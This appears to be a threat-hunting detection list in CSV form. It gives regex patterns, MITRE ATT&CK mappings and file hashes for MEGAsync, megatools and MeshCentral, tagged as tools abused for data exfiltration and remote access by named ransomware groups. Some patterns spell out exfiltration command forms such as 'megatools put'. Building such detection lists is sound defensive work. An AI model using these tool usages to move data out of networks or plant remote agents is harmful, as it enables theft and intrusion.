"*megasync-xUbuntu_*_amd64.deb*",".{0,1000}megasync\-xUbuntu_.{0,1000}_amd64\.deb.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'Product'>MEGAsync*",".{0,1000}\'Product\'\>MEGAsync\<\/Data\>.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ReferrerUrl=https://mega.io/*",".{0,1000}ReferrerUrl\=https\:\/\/mega\.io\/.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'Signature'>Mega Limited*",".{0,1000}\'Signature\'\>Mega\sLimited\<\/Data\>.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*Windows\System32\Tasks\MEGA*",".{0,1000}Windows\\System32\\Tasks\\MEGA.{0,1000}","greyware_tool_keyword","MEGAsync","synchronize or backup your computers to MEGA","T1567.002 - T1537 - T1020 - T1030","TA0010 - TA0040","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://mega.io/en/desktop","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/megatools.exe*",".{0,1000}\/megatools\.exe.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*\.megatools.cache*",".{0,1000}\\\.megatools\.cache.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","","" "*\megatools-*-win64\*",".{0,1000}\\megatools\-.{0,1000}\-win64\\.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. 
Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","","" "*\megatools.exe*",".{0,1000}\\megatools\.exe.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","","" "*\Users\*\AppData\Local\Temp\*.megatools.cache*",".{0,1000}\\Users\\.{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\.megatools\.cache.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","","" "*megatools copy -l * -r *",".{0,1000}megatools\scopy\s\-l\s.{0,1000}\s\-r\s.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. 
Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","","" "*megatools put *",".{0,1000}megatools\sput\s.{0,1000}","greyware_tool_keyword","megatools","Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/megous/megatools","1","0","N/A","N/A","9","","N/A","","","" "* install meshcentral*",".{0,1000}\sinstall\smeshcentral.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "* meshcentral.service*",".{0,1000}\smeshcentral\.service.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "* -omeshcmd.exe -imodule1.js*",".{0,1000}\s\-omeshcmd\.exe\s\-imodule1\.js.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*.meshagent.pid*",".{0,1000}\.meshagent\.pid.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*/bin/meshagent*",".{0,1000}\/bin\/meshagent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*/bin/MeshCommander*",".{0,1000}\/bin\/MeshCommander.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*/MeshAgent --*",".{0,1000}\/MeshAgent\s\-\-.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*/MeshAgent.git*",".{0,1000}\/MeshAgent\.git.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","1","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" 
"*/MeshCentral.git*",".{0,1000}\/MeshCentral\.git.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*/meshcentral.service*",".{0,1000}\/meshcentral\.service.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*/meshinstall.sh*",".{0,1000}\/meshinstall\.sh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*/meshinstall-bsd-rcd.sh*",".{0,1000}\/meshinstall\-bsd\-rcd\.sh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*/system/meshagent*",".{0,1000}\/system\/meshagent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" 
"*/system/MeshCommander*",".{0,1000}\/system\/MeshCommander.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\\MeshAgent*",".{0,1000}\\\\MeshAgent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\CurrentControlSet\Services\Mesh*",".{0,1000}\\CurrentControlSet\\Services\\Mesh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*\meshagent.db*",".{0,1000}\\meshagent\.db.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*\MeshAgent.sln*",".{0,1000}\\MeshAgent\.sln.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*\MeshAgentKvm.log*",".{0,1000}\\MeshAgentKvm\.log.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer 
management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*\MeshAgent-master*",".{0,1000}\\MeshAgent\-master.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*\meshcentral.db*",".{0,1000}\\meshcentral\.db.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\meshcentral.js*",".{0,1000}\\meshcentral\.js.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\MeshCentral.sln*",".{0,1000}\\MeshCentral\.sln.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\MeshCentral\*",".{0,1000}\\MeshCentral\\.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\MeshCmd.exe*",".{0,1000}\\MeshCmd\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\meshcmd.js*",".{0,1000}\\meshcmd\.js.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\meshcommander.dmp*",".{0,1000}\\meshcommander\.dmp.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\MeshMessenger.exe*",".{0,1000}\\MeshMessenger\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*\MeshService.rc*",".{0,1000}\\MeshService\.rc.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" 
"*\node_modules\meshcentral*",".{0,1000}\\node_modules\\meshcentral.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\Open Source\MeshCentral\*",".{0,1000}\\Open\sSource\\MeshCentral\\.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*\Safeboot\Network\AltMeshAgent*",".{0,1000}\\Safeboot\\Network\\AltMeshAgent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*\Uninstall\MeshCentralAgent*",".{0,1000}\\Uninstall\\MeshCentralAgent.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*>Mesh Agent background service<*",".{0,1000}\>Mesh\sAgent\sbackground\sservice\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*>Mesh Agent 
Company<*",".{0,1000}\>Mesh\sAgent\sCompany\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*>meshagentRepair<*",".{0,1000}\>meshagentRepair\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*>MeshCentral Agent<*",".{0,1000}\>MeshCentral\sAgent\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*>MeshCentral<*",".{0,1000}\>MeshCentral\<.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*035cf1744ffefef60ff711aeae4bcf39cd902e0a581b443553545f6b934f2a71*",".{0,1000}035cf1744ffefef60ff711aeae4bcf39cd902e0a581b443553545f6b934f2a71.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" 
"*03A09084-0576-45C5-97CA-B83B1A8688B8*",".{0,1000}03A09084\-0576\-45C5\-97CA\-B83B1A8688B8.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*127ec181a70d665e539d93b8e4a014ce099faf64f0eb790a85158cd5a1349bfd*",".{0,1000}127ec181a70d665e539d93b8e4a014ce099faf64f0eb790a85158cd5a1349bfd.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*128C450F-C8B3-403A-9D0C-E5AD6B7F566F*",".{0,1000}128C450F\-C8B3\-403A\-9D0C\-E5AD6B7F566F.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*169fa5bf73c73e2785691de174d40209dfa479430539acbce08eaf24a4cbb0c0*",".{0,1000}169fa5bf73c73e2785691de174d40209dfa479430539acbce08eaf24a4cbb0c0.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*1e5aad914ec6f6fdbb0c0c340ab0e2c336922fba3e556b007d8d5002a6c478ca*",".{0,1000}1e5aad914ec6f6fdbb0c0c340ab0e2c336922fba3e556b007d8d5002a6c478ca.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full 
computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*1f2cf255b1a6d9fafad11a2d27bc9471f1e883c59a02504794e2846c7f955976*",".{0,1000}1f2cf255b1a6d9fafad11a2d27bc9471f1e883c59a02504794e2846c7f955976.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*2523d17e9fc1b815001f2e7ea951dd3454a78bab0b12cea6a82294b9d93cd95c*",".{0,1000}2523d17e9fc1b815001f2e7ea951dd3454a78bab0b12cea6a82294b9d93cd95c.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*2ca71789c452d549809f184185b08febc560b5dc81030586a3920a95ea7a3d12*",".{0,1000}2ca71789c452d549809f184185b08febc560b5dc81030586a3920a95ea7a3d12.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*3887f7179aa36da3d9fc527a714d6f4be500dd25beede1e161e9f019beaf7636*",".{0,1000}3887f7179aa36da3d9fc527a714d6f4be500dd25beede1e161e9f019beaf7636.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*3b2cec2cc3a2e3185fc1797590dc58421cf4382e86d83e8658990bb3979d7209*",".{0,1000}3b2cec2cc3a2e3185fc1797590dc58421cf4382e86d83e8658990bb3979d7209.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*3f47dae30e9b18dcfd50eef1d188f83171072136257758ea39997818f38d49e8*",".{0,1000}3f47dae30e9b18dcfd50eef1d188f83171072136257758ea39997818f38d49e8.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*43861355ea40db311824a51d5a4c6dc773ebfc0c5862a252a4692847f184594c*",".{0,1000}43861355ea40db311824a51d5a4c6dc773ebfc0c5862a252a4692847f184594c.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*460acbb38b0bdb3d227de65010b1a323f448ec196860ce4979c0b8314763eb56*",".{0,1000}460acbb38b0bdb3d227de65010b1a323f448ec196860ce4979c0b8314763eb56.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309*",".{0,1000}68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*70f1ed3ea1ba5d2fe5430735089f03cbce1b85a4c719ad2adc7d1049345f2b6c*",".{0,1000}70f1ed3ea1ba5d2fe5430735089f03cbce1b85a4c719ad2adc7d1049345f2b6c.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*77432fd21f975da9215b15efc8e0080345732102f7d57a5d9d57f61faa4dfa20*",".{0,1000}77432fd21f975da9215b15efc8e0080345732102f7d57a5d9d57f61faa4dfa20.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*7777E837-E7A3-481B-8BD2-4C76F639ECFC*",".{0,1000}7777E837\-E7A3\-481B\-8BD2\-4C76F639ECFC.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" 
